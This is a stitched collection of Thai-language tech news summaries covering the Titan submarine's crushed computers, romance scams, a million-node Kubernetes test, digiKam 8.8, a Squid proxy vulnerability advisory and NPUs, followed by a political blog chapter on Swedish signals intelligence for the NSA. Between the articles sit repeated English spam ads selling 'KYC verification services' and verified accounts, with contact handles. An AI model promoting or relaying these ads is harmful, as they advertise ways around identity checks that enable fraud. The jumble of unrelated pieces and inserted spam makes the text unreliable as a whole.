"ซากโลหะที่เคยเป็นสมองของ Titan: เบื้องหลังการพังทลายของระบบคอมพิวเตอร์ใต้น้ำลึก"

หลังจากเหตุการณ์การระเบิดของเรือดำน้ำ Titan ของ OceanGate ในปี 2023 ซึ่งคร่าชีวิตผู้โดยสารทั้งหมด การสืบสวนโดย NTSB (คณะกรรมการความปลอดภัยการขนส่งแห่งชาติของสหรัฐฯ) ได้เผยภาพและข้อมูลล่าสุดเกี่ยวกับสภาพของระบบคอมพิวเตอร์ภายในเรือ—ซึ่งถูกบดขยี้จนกลายเป็นกองโลหะบิดเบี้ยวที่แทบไม่เหลือเค้าโครงเดิม

ระบบคอมพิวเตอร์ของ Titan ประกอบด้วยพีซีแบบ fanless รุ่น Nuvo-5000LP จำนวน 3 เครื่อง ซึ่งทำหน้าที่เป็นสมองของเรือในการบันทึกข้อมูลการทำงานและตรวจสอบโครงสร้างเรือแบบอะคูสติก แต่หลังจากการระเบิด พีซีเหล่านี้กลายเป็นก้อนโลหะหนักกว่า 45 กิโลกรัมที่รวมเอาแผงวงจร โลหะ และพลาสติกอัดแน่นเข้าด้วยกัน

แม้จะมีความหวังว่าจะสามารถกู้ข้อมูลจาก SSD ได้ แต่การสแกน CT ไม่สามารถเจาะเข้าไปถึงชิปหน่วยความจำได้ และการใช้พลังงานสูงกว่านี้อาจทำลายข้อมูลที่เหลืออยู่ ทีมงานจึงส่งต่อซากไปยังห้องแล็บของ ATF ซึ่งสามารถแยกแผง SSD ออกมาได้ 2 แผง แต่พบว่าชิปหน่วยความจำเสียหายอย่างหนัก—บางชิปหายไป บางชิปแตกร้าว และไม่มีข้อมูลใดสามารถกู้คืนได้

สภาพของระบบคอมพิวเตอร์หลังเหตุการณ์
พีซี Nuvo-5000LP จำนวน 3 เครื่องถูกบดขยี้รวมกันเป็นก้อนโลหะหนัก ~45 กิโลกรัม
ทำหน้าที่บันทึกข้อมูลการทำงานและตรวจสอบโครงสร้างเรือแบบอะคูสติก
กล้องและอุปกรณ์อื่น ๆ เสียหายเกือบทั้งหมด ยกเว้นการ์ด SD ที่รอดมาได้ในเหตุการณ์อื่น

การสแกนและกู้ข้อมูล
ใช้ CT scan เพื่อตรวจหาชิปหน่วยความจำที่อาจรอด
ไม่พบช่องว่างที่ชิปอาจอยู่รอดได้
หลีกเลี่ยงการใช้พลังงานสูงในการสแกนเพื่อไม่ให้ข้อมูลเสียหาย

การวิเคราะห์โดย ATF
แยกแผง SSD ได้ 2 แผงจากซากโลหะ
พบว่าชิปหน่วยความจำบางส่วนหายไป และบางส่วนแตกร้าว
ไม่สามารถกู้ข้อมูลใด ๆ ได้จากแผงที่เหลือ

คำเตือนจากการออกแบบระบบ
การใช้พีซีแบบ fanless อาจไม่ทนต่อแรงดันและความร้อนจากการระเบิด
ไม่มีระบบป้องกันข้อมูลในกรณีฉุกเฉินหรือการระเบิด
การออกแบบระบบเก็บข้อมูลควรคำนึงถึงการกู้คืนหลังภัยพิบัติ

สาระเพิ่มเติมจากภายนอก:
ความท้าทายในการกู้ข้อมูลจากอุปกรณ์ที่เสียหาย
SSD มีโครงสร้างที่ซับซ้อนและเปราะบางต่อแรงกระแทก
การกู้ข้อมูลต้องใช้เทคนิคระดับสูง เช่น การสกัดชิปและอ่านข้อมูลโดยตรงจาก NAND

บทเรียนจาก Titan สำหรับการออกแบบระบบใต้น้ำ
ควรมีระบบบันทึกข้อมูลซ้ำในหลายตำแหน่ง
ใช้วัสดุที่ทนแรงดันและความร้อนสูง
ออกแบบให้สามารถกู้คืนข้อมูลได้แม้ในกรณีที่โครงสร้างหลักเสียหาย

https://www.tomshardware.com/tech-industry/oceangate-titan-computers-crushed-into-twisted-mass-of-metal-and-electronics-during-catastrophic-implosion-investigators-find-signs-of-thermal-damage-too

"รักออนไลน์หรือหลอกลวง? วิธีสังเกตและป้องกันภัยจาก Romance Scam"

ในยุคที่แอปหาคู่กลายเป็นช่องทางยอดนิยมในการพบปะผู้คนใหม่ ๆ เช่น Tinder, Hinge, OkCupid, Grindr และ Bumble ก็มีภัยเงียบที่แฝงตัวอยู่—Romance Scam หรือการหลอกลวงทางความรักออนไลน์ ซึ่งกลุ่มมิจฉาชีพใช้เทคนิคการสร้างความสัมพันธ์เพื่อหลอกเอาเงินหรือข้อมูลส่วนตัวจากเหยื่อ

มิจฉาชีพเหล่านี้มักเริ่มต้นด้วยการพูดคุยอย่างจริงใจ สร้างความไว้ใจ แล้วค่อย ๆ ขอความช่วยเหลือทางการเงิน หรือเสนอ “โอกาสลงทุน” ที่ดูดีเกินจริง พวกเขาอาจใช้ภาพปลอม โปรไฟล์โซเชียลที่ดูไม่สมจริง หรือแม้แต่เล่าเรื่องเศร้าเพื่อเรียกความสงสาร

ในปี 2023 มีรายงานการหลอกลวงแบบนี้กว่า 64,000 เคส รวมมูลค่าความเสียหายกว่า 1.14 พันล้านดอลลาร์ โดยเหยื่อแต่ละรายสูญเงินเฉลี่ยถึง $2,000 ซึ่งมากกว่าการหลอกลวงรูปแบบอื่น ๆ

รูปแบบของ Romance Scam
เริ่มจากการสร้างความสัมพันธ์ผ่านแอปหาคู่
ค่อย ๆ ขอเงินหรือข้อมูลส่วนตัว
ใช้เรื่องเศร้า เช่น ป่วย, ค่าธรรมเนียมทางกฎหมาย, หรือเหตุฉุกเฉิน เพื่อเรียกความสงสาร

สัญญาณเตือนที่ควรระวัง
นัดเจอแต่ยกเลิกทุกครั้ง
พยายามให้คุณห่างจากเพื่อนหรือครอบครัว
โปรไฟล์โซเชียลดูไม่สมจริง หรือมีการโต้ตอบน้อย
แสดงความรักเร็วเกินไป หรือสร้างความเร่งรีบทางอารมณ์
อ้างว่าอยู่ต่างประเทศเพื่อหลีกเลี่ยงการพบตัวจริง

คำเตือนจาก FBI
มิจฉาชีพมักอ้างว่าอยู่ต่างประเทศชั่วคราว
ใช้ข้ออ้างเรื่องค่ารักษา, ค่าธรรมเนียม, หรือวิกฤตส่วนตัวเพื่อขอเงิน
ปฏิเสธการพบตัวจริงทุกครั้ง

วิธีป้องกันตัว
อย่าให้ข้อมูลส่วนตัวกับคนแปลกหน้า
ใช้เครื่องมือ reverse image search เพื่อตรวจสอบภาพโปรไฟล์
อย่าส่งเงินหรือของขวัญให้คนที่คุณไม่เคยเจอตัวจริง
เล่าเรื่องความสัมพันธ์ให้คนใกล้ตัวฟัง เพื่อให้มองเห็นมุมที่คุณอาจมองไม่ออก
หากสงสัยว่าโดนหลอก ให้หยุดติดต่อทันที และแจ้งตำรวจหรือ FBI

สาระเพิ่มเติมจากภายนอก:

ความเข้าใจเรื่อง Catfishing
คือการสร้างตัวตนปลอมเพื่อหลอกลวงทางอารมณ์หรือการเงิน
มักใช้ภาพคนอื่นและเรื่องราวที่แต่งขึ้นเพื่อสร้างความน่าเชื่อถือ

การป้องกันในเชิงจิตวิทยา
อย่าปล่อยให้ความเหงาทำให้คุณลดการใช้วิจารณญาณ
ความรักที่แท้จริงไม่ควรเริ่มต้นด้วยการขอเงิน

https://www.slashgear.com/1996880/things-need-know-avoid-online-dating-romance-scams-catfish/

"Kubernetes 1 ล้านโหนด: ภารกิจสุดโหดที่กลายเป็นจริง"

ลองจินตนาการถึง Kubernetes cluster ที่มีถึง 1 ล้านโหนด—ไม่ใช่แค่แนวคิด แต่เป็นการทดลองจริงที่ผลักดันขีดจำกัดของระบบ cloud-native ที่ทรงพลังที่สุดในโลกใบนี้! โครงการ “k8s-1m” โดยผู้เชี่ยวชาญจาก OpenAI และอดีตผู้ร่วมเขียนบทความชื่อดังเรื่องการขยาย Kubernetes สู่ 7,500 โหนด ได้กลับมาอีกครั้ง พร้อมเป้าหมายใหม่ที่ทะเยอทะยานกว่าเดิม: สร้าง cluster ที่มี 1 ล้านโหนดและสามารถจัดการ workload ได้จริง

เบื้องหลังความสำเร็จนี้คือการแก้ปัญหาทางเทคนิคระดับมหากาพย์ ตั้งแต่การจัดการ IP ด้วย IPv6, การออกแบบระบบ etcd ใหม่ให้รองรับการเขียนระดับแสนครั้งต่อวินาที, ไปจนถึงการสร้าง distributed scheduler ที่สามารถจัดสรร 1 ล้าน pods ได้ภายใน 1 นาที

แม้จะไม่ใช่ระบบที่พร้อมใช้งานใน production แต่โครงการนี้ได้เปิดเผยขีดจำกัดที่แท้จริงของ Kubernetes และเสนอแนวทางใหม่ในการออกแบบระบบ cloud-native ที่สามารถรองรับ workload ขนาดมหาศาลได้ในอนาคต

สรุปเนื้อหาจากโครงการ k8s-1m:

เป้าหมายของโครงการ
สร้าง Kubernetes cluster ที่มี 1 ล้านโหนด
ทดสอบขีดจำกัดของระบบ cloud-native
ไม่เน้นการใช้งานเชิงพาณิชย์ แต่เพื่อการวิจัยและแรงบันดาลใจ

ปัญหาหลักที่ต้องแก้
ประสิทธิภาพของ etcd ที่เป็นคอขวด
ความสามารถของ kube-apiserver ในการจัดการ watch cache
การจัดการ IP address ด้วย IPv6
การออกแบบ scheduler ให้กระจายโหลดได้

เทคนิคที่ใช้ในระบบเครือข่าย
ใช้ IPv6 แทน IPv4 เพื่อรองรับ IP จำนวนมหาศาล
สร้าง bridge สำหรับ pod interfaces เพื่อจัดการ MAC address
ใช้ WireGuard เป็น NAT64 gateway สำหรับบริการที่รองรับเฉพาะ IPv4

ข้อจำกัดด้านความปลอดภัย
ไม่ใช้ network policies ระหว่าง workloads เพราะมี prefix มากเกินไป
ไม่ใช้ firewall ครอบคลุมทุก prefix แต่ใช้ TLS และการจำกัดพอร์ตแทน

การจัดการ state ด้วย mem_etcd
สร้าง etcd ใหม่ที่เขียนด้วย Rust ชื่อ mem_etcd
ลดการใช้ fsync เพื่อเพิ่ม throughput
ใช้ hash map และ B-tree แยกตาม resource kind
รองรับการเขียนระดับล้านครั้งต่อวินาที

คำเตือนเกี่ยวกับ durability
ลดระดับความทนทานของข้อมูลเพื่อเพิ่มประสิทธิภาพ
ไม่ใช้ etcd replicas ในบางกรณีเพื่อหลีกเลี่ยงการลด throughput

การออกแบบ scheduler แบบกระจาย
ใช้แนวคิด scatter-gather เพื่อกระจายการคำนวณ
ใช้ relays หลายระดับเพื่อกระจาย pod ไปยัง schedulers
ใช้ ValidatingWebhook แทน watch stream เพื่อรับ pod ใหม่เร็วขึ้น

ปัญหา long-tail latency
บาง scheduler ช้ากว่าค่าเฉลี่ย ทำให้ระบบรอ
ใช้เทคนิค pinned CPUs และปรับ GC เพื่อลดความล่าช้า
ตัดสินใจไม่รอ scheduler ที่ช้าเกินไป

ผลการทดลอง
สามารถจัดสรร 1 ล้าน pods ได้ในเวลาประมาณ 1 นาที
mem_etcd รองรับ 100K–125K requests/sec
kube-apiserver รองรับ 100K lease updates/sec
ระบบใช้ RAM และ CPU อย่างมีประสิทธิภาพ

ข้อจำกัดของภาษา Go
GC ของ Go เป็นคอขวดหลักในการจัดการ object จำนวนมาก
การเพิ่ม kube-apiserver replicas ไม่ช่วยลด GC load

ข้อสรุปจากโครงการ
ขนาด cluster ไม่สำคัญเท่ากับอัตราการเขียนของ resource kind
Lease updates เป็นภาระหลักของระบบ
การแยก etcd ตาม resource kind ช่วยเพิ่ม scalability
การเปลี่ยน backend ของ etcd และปรับ watch cache ช่วยรองรับ 1 ล้านโหนด

https://bchess.github.io/k8s-1m/

“digiKam 8.8 เพิ่มฟีเจอร์ใช้โปรไฟล์สีจอภาพอัตโนมัติบน Wayland” — เมื่อการจัดการภาพถ่ายก้าวสู่ความแม่นยำระดับมืออาชีพ

digiKam 8.8 ซึ่งเป็นแอปจัดการภาพถ่ายแบบโอเพ่นซอร์ส ได้เปิดตัวพร้อมฟีเจอร์ใหม่ที่น่าสนใจ โดยเฉพาะการรองรับการใช้โปรไฟล์สีของจอภาพแบบอัตโนมัติบนระบบ Wayland ซึ่งช่วยให้การแสดงผลภาพมีความเที่ยงตรงมากขึ้น โดยไม่ต้องตั้งค่าด้วยตนเอง

นอกจากนั้นยังมีการปรับปรุงหลายด้าน เช่น:

รองรับการแสดงจุดโฟกัสของกล้อง FujiFilm และ Olympus/OM Systems ในโหมด Preview
เพิ่มเครื่องมือเบลอพื้นหลังแบบค่อยเป็นค่อยไปใน Image Editor
อัปเดตปลั๊กอิน G’MIC-Qt เป็นเวอร์ชัน 3.6 เพื่อเพิ่มความสามารถในการประมวลผลภาพ
ปรับปรุงระบบแจ้งเตือน (Progress Manager) ให้ใช้ native desktop notifications บน Linux, macOS และ Windows
แก้ปัญหาความเสถียรใน Wayland และ Windows 11
รองรับ Qt 6.10 เพื่อเพิ่มประสิทธิภาพและความเข้ากันได้กับระบบปฏิบัติการใหม่
ปรับปรุงการจัดการแท็ก, การแสดง thumbnail, การเลือกภาษา และการแปลเป็น 61 ภาษา

ผู้ใช้สามารถดาวน์โหลด digiKam 8.8 ได้ในรูปแบบ AppImage ซึ่งสามารถรันได้บน Linux ทุกดิสโทรโดยไม่ต้องติดตั้ง หรือเลือกติดตั้งผ่าน repository หรือ Flatpak จาก Flathub

https://9to5linux.com/digikam-8-8-adds-support-to-automatically-use-monitor-color-profiles-on-wayland

“ช่องโหว่ CVE-2025-62168 ใน Squid Proxy รั่วข้อมูล HTTP Credentials และ Security Tokens ผ่านการจัดการ Error Page” — เมื่อการแสดงหน้าข้อผิดพลาดกลายเป็นช่องทางให้แฮกเกอร์ขโมยข้อมูลลับ

เล่าเรื่องให้ฟัง: Squid Proxy ซึ่งเป็นซอฟต์แวร์โอเพ่นซอร์สยอดนิยมสำหรับการแคชและเร่งการเข้าถึงเว็บ ถูกพบช่องโหว่ร้ายแรงระดับ CVSS 10.0 (เต็ม 10) โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีสามารถขโมยข้อมูลรับรอง (credentials) และโทเคนความปลอดภัย (security tokens) ผ่านการจัดการ error page ที่ผิดพลาด

ปัญหาเกิดจากการที่ Squid ไม่สามารถ “redact” หรือปกปิดข้อมูล HTTP Authentication credentials ได้อย่างถูกต้องเมื่อเกิดข้อผิดพลาด ทำให้ข้อมูลเหล่านี้ถูกฝังอยู่ใน error response ที่ส่งกลับไปยังผู้ใช้ — และสามารถถูกอ่านได้โดยสคริปต์ที่ออกแบบมาเพื่อหลบเลี่ยงการป้องกันของเบราว์เซอร์

ที่น่ากังวลคือ:
ช่องโหว่นี้ส่งผลกระทบต่อทุกเวอร์ชันของ Squid จนถึง 7.1
แม้จะไม่ได้เปิดใช้ HTTP Authentication ก็ยังเสี่ยง
หากเปิดใช้งาน email_err_data ในการตั้งค่า squid.conf จะยิ่งเพิ่มความเสี่ยง
ข้อมูลที่รั่วอาจรวมถึงโทเคนภายในที่ใช้ระหว่าง backend services

นักพัฒนาของ Squid ได้ออกแพตช์ในเวอร์ชัน 7.2 เพื่อแก้ไขปัญหานี้ โดยแนะนำให้ผู้ดูแลระบบ:

ปิดการใช้งาน email_err_data ทันที
อัปเดตเป็นเวอร์ชัน 7.2 หรือใช้ patch ที่เผยแพร่แยกต่างหาก

ช่องโหว่ CVE-2025-62168 ได้คะแนน CVSS 10.0
ระดับวิกฤตสูงสุดตามมาตรฐานความปลอดภัย

เกิดจากการจัดการ error page ที่ไม่ปกปิดข้อมูล HTTP credentials
ข้อมูลรั่วใน response ที่ส่งกลับไปยังผู้ใช้

ส่งผลกระทบต่อ Squid ทุกเวอร์ชันจนถึง 7.1
แม้ไม่ได้เปิดใช้ HTTP Authentication ก็ยังเสี่ยง

หากเปิดใช้งาน email_err_data จะเพิ่มความเสี่ยง
เพราะ debug info ถูกฝังใน mailto link

ข้อมูลที่รั่วอาจรวมถึง security tokens ที่ใช้ภายในระบบ
เสี่ยงต่อการถูกใช้เพื่อเจาะ backend services

แพตช์แก้ไขอยู่ใน Squid เวอร์ชัน 7.2
พร้อม patch แยกสำหรับผู้ที่ยังไม่สามารถอัปเกรดได้

https://securityonline.info/critical-squid-proxy-flaw-cve-2025-62168-cvss-10-0-leaks-http-credentials-and-security-tokens-via-error-handling/

“Neural Engine คืออะไร? ต่างจาก GPU อย่างไร?” — เมื่อชิป AI กลายเป็นหัวใจของอุปกรณ์ยุคใหม่ และ NPU คือผู้เล่นตัวจริง

บทความจาก SlashGear อธิบายว่า Neural Engine หรือ NPU (Neural Processing Unit) คือชิปเฉพาะทางที่ออกแบบมาเพื่อเร่งการประมวลผลด้าน AI และ machine learning โดยเฉพาะ ต่างจาก CPU ที่เน้นงานเชิงตรรกะ และ GPU ที่เน้นงานกราฟิกและการคำนวณแบบขนาน

Apple เป็นหนึ่งในบริษัทแรกที่นำ Neural Engine มาใช้ใน iPhone X ปี 2017 เพื่อช่วยงาน Face ID และการเรียนรู้ของ Siri ปัจจุบัน NPU ถูกฝังอยู่ในอุปกรณ์หลากหลาย เช่น สมาร์ตโฟน, แท็บเล็ต, คอมพิวเตอร์ และแม้แต่ IoT

NPU มีจำนวนคอร์มากกว่า CPU และออกแบบมาเพื่อการคำนวณซ้ำ ๆ เช่น matrix multiplication ซึ่งเป็นหัวใจของ neural networks นอกจากนี้ยังมีหน่วยความจำในตัว (on-chip memory) เพื่อลด latency และเพิ่มประสิทธิภาพ

GPU ก็สามารถใช้ประมวลผล AI ได้เช่นกัน โดยเฉพาะในระดับ data center เช่นที่ OpenAI ใช้ GPU จาก NVIDIA และ AMD แต่ GPU ไม่ได้ถูกออกแบบมาเพื่อ AI โดยตรง จึงใช้พลังงานมากกว่าและมีประสิทธิภาพต่ำกว่า NPU ในงานเฉพาะทาง

ในอุปกรณ์พกพา เช่น iPhone 16 หรือ Pixel 10 NPU ถูกใช้เพื่อรันฟีเจอร์ AI แบบ local เช่น live translation, image generation และ call transcribing โดยไม่ต้องพึ่ง cloud

Neural Engine หรือ NPU คือชิปเฉพาะทางสำหรับงาน AI
เช่น Face ID, Siri, live translation, image generation

NPU มีจำนวนคอร์มากกว่า CPU และออกแบบเพื่อ matrix multiplication
เหมาะกับงาน neural networks และ machine learning

มีหน่วยความจำในตัวเพื่อลด latency และเพิ่มประสิทธิภาพ
ทำให้เร็วและประหยัดพลังงานกว่า GPU

GPU ก็สามารถใช้ประมวลผล AI ได้
โดยเฉพาะในระดับ data center เช่น OpenAI ใช้ GPU cluster

GPU ไม่ได้ออกแบบมาเพื่อ AI โดยตรง
ใช้พลังงานมากกว่าและมีประสิทธิภาพต่ำกว่า NPU ในงานเฉพาะทาง

อุปกรณ์พกพาใช้ NPU เพื่อรันฟีเจอร์ AI แบบ local
ไม่ต้องพึ่ง cloud เช่น iPhone 16 และ Pixel 10

https://www.slashgear.com/1997513/what-is-a-neural-engine-how-npu-different-than-gpu/

Buy KYC verification Services

https://globalseoshop.com/product/buy-kyc-verification-services/

On the off chance that you need more data simply thump us-
Email: Globalseoshop@gmail.com
WhatsApp: +1(864)7088783
Skype: GlobalSeoShop
Telegram: @GlobalSeoShop

#BuyAccountVerification
#BuyVerifiedAccount
#BuyKYCverificationServices
#BuyKYCverification
#KYCverificationServices

Catch up with gals.

“Amazon ควรเลิกขาย 3 หมวดอุปกรณ์จัดเก็บข้อมูล — เพราะมันทำให้คนสับสน” — เมื่อ Floppy, Zip และ Tape Drives ยังอยู่ในหมวด ‘Hot New Releases’ ปี 2025

TechRadar ชี้ว่า Amazon ยังคงแสดงหมวดสินค้าเก่าอย่าง Floppy Drives, Zip Drives และ Tape Libraries ในหน้า “Hot New Releases” ซึ่งอาจทำให้ผู้ซื้อเข้าใจผิดว่ามันยังเป็นเทคโนโลยีที่ทันสมัยหรือมีความต้องการสูง ทั้งที่จริงแล้วเป็นอุปกรณ์ที่ล้าสมัยไปหลายสิบปี

ผู้เขียนเล่าว่าตนเองมีอุปกรณ์เก่าเหล่านี้เก็บไว้เต็มบ้าน เช่น floppy disk drives, optical drives, และ external Zip drives ซึ่งไม่เคยใช้งานอีกเลย แต่ Amazon กลับยังมีหมวดสินค้าเหล่านี้อยู่ในหน้าแรกของการจัดอันดับสินค้าใหม่

แม้จะมีสินค้าใหม่ในหมวดเหล่านี้ เช่น USB floppy emulator หรือ external Zip drive รุ่นใหม่ แต่การที่ Amazonยังคงแสดงหมวดเหล่านี้ในหน้า “best-selling new and future releases” อาจทำให้ผู้ใช้ทั่วไปสับสน และคิดว่าสินค้าเหล่านี้ยังมีความเกี่ยวข้องกับเทคโนโลยีปัจจุบัน

ผู้เขียนเสนอว่า Amazon ควร “เกษียณ” หมวดเหล่านี้เพื่อให้หน้า Hot New Releases ดูทันสมัยและมีความเกี่ยวข้องกับผู้ใช้มากขึ้น

Amazon ยังแสดงหมวด Floppy, Zip และ Tape Drives ในหน้า Hot New Releases
แม้จะเป็นเทคโนโลยีที่ล้าสมัยไปแล้ว

ผู้เขียนมีอุปกรณ์เก่าเหล่านี้เก็บไว้แต่ไม่ใช้งาน
เช่น floppy disk drives และ optical drives

ยังมีสินค้าใหม่ในหมวดเหล่านี้ เช่น USB floppy emulator
แต่ไม่ได้หมายความว่าเป็นเทคโนโลยีที่ทันสมัย

การแสดงหมวดเหล่านี้อาจทำให้ผู้ใช้สับสน
โดยเฉพาะผู้ที่ไม่รู้ว่าอุปกรณ์เหล่านี้หมดความนิยมไปแล้ว

ผู้เขียนเสนอให้ Amazon ยกเลิกหมวดเหล่านี้
เพื่อให้หน้า Hot New Releases ดูทันสมัยและมีความหมายมากขึ้น

https://www.techradar.com/pro/amazon-should-retire-these-3-hardware-storage-categories-asap-to-stop-confusing-people

Buy KYC verification Services

https://globalseoshop.com/product/buy-kyc-verification-services/

On the off chance that you need more data simply thump us-
Email: Globalseoshop@gmail.com
WhatsApp: +1(864)7088783
Skype: GlobalSeoShop
Telegram: @GlobalSeoShop

#BuyAccountVerification
#BuyVerifiedAccount
#BuyKYCverificationServices
#BuyKYCverification
#KYCverificationServices
#BuyKYCServices
#verificationServices

Buy KYC verification Services

https://globalseoshop.com/product/buy-kyc-verification-services/

On the off chance that you need more data simply thump us-
Email: Globalseoshop@gmail.com
WhatsApp: +1(864)7088783
Skype: GlobalSeoShop
Telegram: @GlobalSeoShop

#BuyAccountVerification
#BuyVerifiedAccount
#BuyKYCverificationServices

ผลัดกันล้วง ตอนที่ 4
นิทานเรื่องจริง เรื่อง “ผลัดกันล้วง”
ตอนที่ 4 (ตอนจบ)

“สวีเดน ทำการจารกรรมข้อมูลเกี่ยวกับ รัสเซีย ให้อเมริกามานานแล้ว ”

โทรทัศน์ สวีเดน Sveriges Television ( SVT ) ออกข่าวนี้ ตั้งแต่ปลายปี 2013 บอกว่า เรื่องนี้อยู่ในเอกสาร ที่นาย Edward Snowden เอามาปูด จนต้องหนีหัวซุกหัวซุนไปน่ะและตอนนี้ นาย Snowden ก็คงกำลังนั่งซุกหัว ซุกตัว อยู่ในที่หลบภัยอุ่นๆ ตรงไหนสักแห่งหนึ่งของรัสเซีย และเล่าเรื่องที่มีรายละเอียดน่าสนใจเพิ่มเติม ให้เจ้าของที่หลบภัยฟังต่อ

ความจริงเรื่องนี้ไม่ใช่เรื่องใหม่ ผู้สื่อข่าวสวีเดน นาย Martin Jonsson ได้พยายามขุดมา ตั้งแต่ปี 2005 เกี่ยวกับหน่วยงานข่าวกรองของสวีเดน ชื่อ Forsvarets Radioanstalt ( FRA ) แปลคร่าวๆ คือ National Defense Radio Establishment ซึ่งมีข่าวว่า ตั้งขึ้นมา เพื่อทำการจารกรรมข้อมูลจากสัญญาน ( wiretap ) ที่ผ่านไปมาอยู่แถบนั้น ให้กับ National Security Agency (NSA) ของอเมริกา โดยใช้ระบบที่รู้จักกันในชื่อ Echelon ที่โด่งดัง และประสิทธิภาพน่าขนลุก (ที่ใช้ลูกกลมเหมือนลูกปิงปองยักษ์) แต่ความเป็นจริง Echelon เป็นเพียงหนึ่งในระบบต่างๆที่ NSA ใช้ ยังมีระบบอื่นที่น่าตกใจกว่า อีกแยะ.

นาย Jonsson บอกว่า NSA เป็นหน่วยงานข่าวกรองที่ใหญ่ที่สุดของอเมริกา และเป็นศูนย์กลางของเครือข่ายการดักฟัง ที่ใหญ่ที่สุดในโลก และ FRA ก็เป็นส่วนหนึ่ง ของเครือข่ายนี้

NSA มีขนาด และเครือข่ายใหญ่กว่า CIA มาก โดย NSA เน้นการหาข่าวกรองจากคลื่นสัญญานต่างๆ ที่ส่งกันทั้ง บนดิน ใต้ดิน บนเรือ ใต้น้ำ บนท้องฟ้า ในเครื่องบิน จากดาวเทียม ฯลฯ โดยมีการทำสัญญาการให้ร่วมมือกัน ระหว่าง อเมริกา อังกฤษ แคนาดา นิวซีแลนด์ และออสเตรเลีย เรียกว่า กลุ่ม Five Eyes ตั้งแต่ ปี 1954 เพื่อแลกเปลี่ยน ข้อมูลระหว่างกันอย่างเข้มข้น โดยเฉพาะในช่วงสงครามเย็น

นาย Jonssen เล่าว่า ตอนนั้น เราเพียงรู้ว่า เครือข่ายดักฟังข้อมูล มีเพียง 5 ประเทศ ดังกล่าว ต่อมาปี 2007 มีข่าวเล็ดลอดออกมาว่า สวีเดน อาจจะเป็น ประเทศที่ 6 ที่จะได้เข้าไปร่วมกับเครือข่ายนี้ด้วย โดยจะทำสัญญาเพิ่ม ขณะเดียวกัน เพื่อเป็นการเตรียมตัวให้พร้อม สวีเดนก็ดำเนินการออกกฏหมาย ที่รู้จักกันในชื่อ FRA law ให้รัฐสามารถดักฟัง เก็บข้อมูลทุกอย่าง ที่ผ่านเข้ามาในอาณาเขตของสวีเดน ไม่ว่า จะเป็นทางโทรศัพท์ หรือทางเอกสาร ฯลฯได้ ซึ่งเดิมถือว่าเป็นการผิดกฏหมาย ในเรื่องการละเมิดสิทธิ โดยทาง NSA ส่งทีมมาช่วยร่างกฏหมาย เตี๊ยมคำถามคำตอบ ที่ทางรัฐจะต้องตอบกับสภาประชาชนและสื่อ เล่นกันแบบนั้นเลย นึกว่าจะมีแต่แถวบ้านสมันน้อย

ชาวสวีเดน ต่างออกมาประท้วงร่างกฏหมายฉบับนี้ อย่างมากมาย แต่ในที่สุด ฝ่ายรัฐก็ชนะไปอย่างเฉียดฉิว วันที่ 13 เดือนเมษายน 2007 Odenberg รัฐมนตรีกลาโหมของสวีเดน กับ Chertoff หัวหน้า Homeland Security ของอเมริกา ก็ลงนามในสัญญาที่มีผลให้ สวีเดน รับหน้าที่ ทำการดักฟังการสื่อสารระหว่างประเทศทั้งหมดของรัสเซีย และแชร์ข้อมูลที่ได้รับกับอเมริกา หลังจากนั้นไม่นาน ข่าวเกี่ยวกับสัญญาล้วงตับนี้ก็หลุดออกมาถึงสื่อ รัฐบาลสวีเดนพยายามแก้ตัวว่า มันเป็นเรื่องจำเป็น เกี่ยวกับความมั่นคงของประเทศ เป็นเรื่องธรรมดา หลายประเทศก็ทำสัญญาเช่นนี้กับอเมริกา
ส่วน FRA law ฝีแตกที่หลัง ชาวสวีเดนเพิ่งรู้เรื่อง ต่างไม่พอใจการกระทำของรัฐบาล สื่อ และพรรคฝ่ายค้าน พากันสอบถามรัฐบาล รัฐบาลแก้ตัวไม่หลุด แถไปเรื่อยๆ ข้อแก้ตัวอันหนึ่ง ที่ทำให้ชาวบ้านยิ่งงงหนัก คือคำตอบที่บอกว่า การล้วงตับรัสเซีย เป็นเรื่องจำเป็น สำหรับการป้องกันพวกทหารของเรา ที่ส่งไปรบที่อาฟกานิสถาน อืม เป็นการอ้างเหตุผลได้บัดซบ ไม่น้อยกว่านักการเมืองแถวบ้านสมันน้อย สวีเดนส่งกองทหารไปช่วยอเมริกาถล่มอาฟกานิสถาน และลิเบียในช่วงปี 2011 รวมทั้งส่งเครื่องบินรบ Saab Gripen ที่โด่งดัง ไปช่วยด้วย

เป็นการดูแลความมั่นคงของสวีเดน ที่ใช้วิสัยทัศน์ ที่ยาว และระยะทางอ้อมไกลมาก

สื่อสวีเดนไม่ยอมหยุด ช่วยกันขุดต่อ และนำมาเปิดเผยว่า ประมาณ 80% ของการใช้อินเตอร์เนทระหว่างประเทศของรัสเซีย ต้องผ่านเส้นทางสวีเดน นับว่าอเมริกามีตาแหลมคม เลือกคนล้วงตับได้เก่งจริงๆ นอกจากนี้ TeliaSonera บริษัทร่วมทุนยักษ์ใหญ่ ของสวีเดนและฟินแลนด์ ซึ่งมีเครือข่ายใยแก้ว ( fiberoptic ) ใหญ่ที่สุดของโลกบริษัทหนึ่ง และได้รับสัมปทานประกอบกิจการโทรศัพท์เคลื่อนที่ ในรัสเซียรายหนึ่งนั้น ถ้าดูตามแผนที่ของบริษัท จะเห็นว่า ได้มีการวางแผน การวางเส้นทางสายใยแก้วของบริษัท ที่มีผลให้การสื่อสารของรัสเซีย ต้องทำผ่านสวีเดน การส่งเมล์ และโทรศัพท์ ไปต่างประเทศของรัสเซีย ต้องผ่านสต๊อกโฮมก่อน ไม่ว่าผู้รับจะอยูที่ใด เยี่ยมจริงๆ

ความร่วม มือระหว่าง FRA กับ NSA ขยายตัวขึ้นอย่างมโหฬาร ตั้งแต่ 2011 NSA สามารถดักฟัง การสื่อสารในประเทศแถบบอลติกได้หมด ผ่านเคเบิลของสวีเดน

Duncan Campbell สื่อชาวอังกฤษ ประเภทเกาะติด ตามขุดลึกอย่างไม่เลิก ตามสืบเรื่อง การล้วงตับดักฟังข้อมูลต่อ ได้ข้อมูลลึกมาเพียบ เขาบอกว่า องค์กรที่มาร่วมเป็นตาที่ 6 กับกลุ่ม Five Eyes และถือว่าเป็นหุ้นส่วนใหญ่ ที่ ไม่ได้เป็นประเทศ ที่ใช้ภาษาอังกฤษเป็นภาษาแม่ แต่ให้ความร่วมมือเป็นอย่างดียิ่ง กับหน่วยงานของรัฐบาลอังกฤษ UK’s Government Communications Head Quarters (GCHQ) คือสวีเดน!

